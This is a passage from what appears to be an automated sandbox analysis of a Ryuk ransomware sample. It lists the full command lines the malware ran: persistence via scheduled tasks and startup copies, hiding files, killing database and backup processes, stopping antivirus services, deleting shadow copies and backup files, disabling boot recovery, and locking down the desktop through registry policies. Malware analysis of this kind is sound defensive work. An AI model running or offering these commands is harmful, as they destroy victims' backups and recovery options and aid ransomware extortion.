PID 1324 wrote to memory of 1464	1324	cmd.exe	schtasks.exe
PID 1324 wrote to memory of 1464	1324	cmd.exe	schtasks.exe
PID 576 wrote to memory of 916	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 916	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 916	576	ryuk.exe	cmd.exe
PID 916 wrote to memory of 1104	916	cmd.exe	schtasks.exe
PID 916 wrote to memory of 1104	916	cmd.exe	schtasks.exe
PID 916 wrote to memory of 1104	916	cmd.exe	schtasks.exe
PID 576 wrote to memory of 680	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 680	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 680	576	ryuk.exe	cmd.exe
PID 680 wrote to memory of 1680	680	cmd.exe	attrib.exe
PID 680 wrote to memory of 1680	680	cmd.exe	attrib.exe
PID 680 wrote to memory of 1680	680	cmd.exe	attrib.exe
PID 576 wrote to memory of 588	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 588	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 588	576	ryuk.exe	cmd.exe
PID 588 wrote to memory of 524	588	cmd.exe	attrib.exe
PID 588 wrote to memory of 524	588	cmd.exe	attrib.exe
PID 588 wrote to memory of 524	588	cmd.exe	attrib.exe
PID 576 wrote to memory of 1296	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1296	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1296	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1416	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1416	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 1416	576	ryuk.exe	cmd.exe
PID 1296 wrote to memory of 972	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 972	1296	cmd.exe	cmd.exe
PID 1296 wrote to memory of 972	1296	cmd.exe	cmd.exe
PID 576 wrote to memory of 384	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 384	576	ryuk.exe	cmd.exe
PID 576 wrote to memory of 384	576	ryuk.exe	cmd.exe
PID 384 wrote to memory of 1236	384	cmd.exe	cmd.exe
PID 384 wrote to memory of 1236	384	cmd.exe	cmd.exe
PID 384 wrote to memory of 1236	384	cmd.exe	cmd.exe
PID 1416 wrote to memory of 1584	1416	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1536 attrib.exe
1680 attrib.exe
524 attrib.exe
2692 attrib.exe
2712 attrib.exe

pid	process
1536	attrib.exe
1680	attrib.exe
524	attrib.exe
2692	attrib.exe
2712	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
3⤵
- Creates scheduled task(s)
PID:1104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:972

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:1396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:2044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1620

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1376

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:1088

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:984

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:1780

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:1928

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:1516

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1800

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:1952

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:2024

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:560

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1524

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:384

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:1696

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:1092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:860

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:1944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:1200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:700

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:1532

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1536

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:1164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:1836

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:1424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1664

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:1200

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:1552

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:1664

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:1552

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:2180

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:2216

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:2252

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:2436

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:2508

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:2544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:2580

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:2624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:2656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:2680

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:2704

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:2724

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:2744

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:2760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:2828

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2848

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:2856

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
3⤵
- Creates scheduled task(s)
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2864

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:2872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:2880

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:2896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:2912

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:2944

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:2960

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:2968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:2976

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:2992

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:3000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:3008

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:3040

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:3056

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1792

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1964

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:700

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:2172

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2168

